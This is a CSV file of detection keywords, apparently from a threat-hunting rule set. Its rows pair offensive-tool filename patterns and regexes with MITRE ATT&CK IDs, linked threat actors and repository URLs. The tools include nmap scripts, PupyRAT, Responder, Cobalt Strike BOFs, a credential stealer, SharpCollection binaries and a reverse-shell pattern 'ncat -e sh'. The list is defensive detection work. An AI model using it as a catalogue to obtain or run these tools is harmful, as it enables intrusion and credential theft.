"*/nat-pmp-mapport.nse*",".{0,1000}\/nat\-pmp\-mapport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9018"
"*/navicatpwd.exe*",".{0,1000}\/navicatpwd\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9020"
"*/nbd-info.nse*",".{0,1000}\/nbd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9021"
"*/nbns-interfaces.nse*",".{0,1000}\/nbns\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9022"
"*/nbnsspoof.py*",".{0,1000}\/nbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9023"
"*/nbstat.nse*",".{0,1000}\/nbstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9024"
"*/NBTNS.py*",".{0,1000}\/NBTNS\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","9025"
"*/nc_srv.bat",".{0,1000}\/nc_srv\.bat","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","9026"
"*/ncat * -e sh*",".{0,1000}\/ncat\s.{0,1000}\s\-e\ssh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","9030"
"*/nccgroup/nccfsas/*",".{0,1000}\/nccgroup\/nccfsas\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","9031"
"*/ncp-enum-users.nse*",".{0,1000}\/ncp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9032"
"*/ncp-serverinfo.nse*",".{0,1000}\/ncp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9033"
"*/ncrack-*",".{0,1000}\/ncrack\-.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","0","#linux","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","9034"
"*/ncrack.git*",".{0,1000}\/ncrack\.git.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","9035"
"*/ndmp-fs-info.nse*",".{0,1000}\/ndmp\-fs\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9036"
"*/ndmp-version.nse*",".{0,1000}\/ndmp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9037"
"*/ndp_spoof*",".{0,1000}\/ndp_spoof.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","9038"
"*/ndroRat Binder.exe*",".{0,1000}\/ndroRat\sBinder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","9039"
"*/Necro-Stealer.git*",".{0,1000}\/Necro\-Stealer\.git.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","1","N/A","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","9040"
"*/Needle_Sift_BOF/*",".{0,1000}\/Needle_Sift_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","N/A","10","10","32","8","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z","9041"
"*/Nemesis.git*",".{0,1000}\/Nemesis\.git.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9042"
"*/nemesis_connector.py*",".{0,1000}\/nemesis_connector\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9043"
"*/nemesis_db.py*",".{0,1000}\/nemesis_db\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9044"
"*/nemesis_reg_collect_parser.py*",".{0,1000}\/nemesis_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9045"
"*/nemesis-cli.py*",".{0,1000}\/nemesis\-cli\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9046"
"*/nessus.py*",".{0,1000}\/nessus\.py.{0,1000}","offensive_tool_keyword","crackmapexec","parser nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9052"
"*/nessus.rb*",".{0,1000}\/nessus\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9053"
"*/nessus-brute.nse*",".{0,1000}\/nessus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9054"
"*/nessus-xmlrpc-brute.nse*",".{0,1000}\/nessus\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9055"
"*/net_4.0_32_RunasCs.exe*",".{0,1000}\/net_4\.0_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9056"
"*/net_4.0_32SharpDoor.exe*",".{0,1000}\/net_4\.0_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9057"
"*/net_4.0_32sharpfiles.exe*",".{0,1000}\/net_4\.0_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9058"
"*/net_4.0_64_RunasCs.exe*",".{0,1000}\/net_4\.0_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9059"
"*/net_4.0_64SharpDoor.exe*",".{0,1000}\/net_4\.0_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9060"
"*/net_4.0_64sharpfiles.exe*",".{0,1000}\/net_4\.0_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9061"
"*/net_4.0_Any_RunasCs.exe*",".{0,1000}\/net_4\.0_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9062"
"*/net_4.0_AnySharpDoor.exe*",".{0,1000}\/net_4\.0_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9063"
"*/net_4.0_Anysharpfiles.exe*",".{0,1000}\/net_4\.0_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9064"
"*/net_4.5_32_RunasCs.exe*",".{0,1000}\/net_4\.5_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9065"
"*/net_4.5_32SharpDoor.exe*",".{0,1000}\/net_4\.5_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9066"
"*/net_4.5_32sharpfiles.exe*",".{0,1000}\/net_4\.5_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9067"
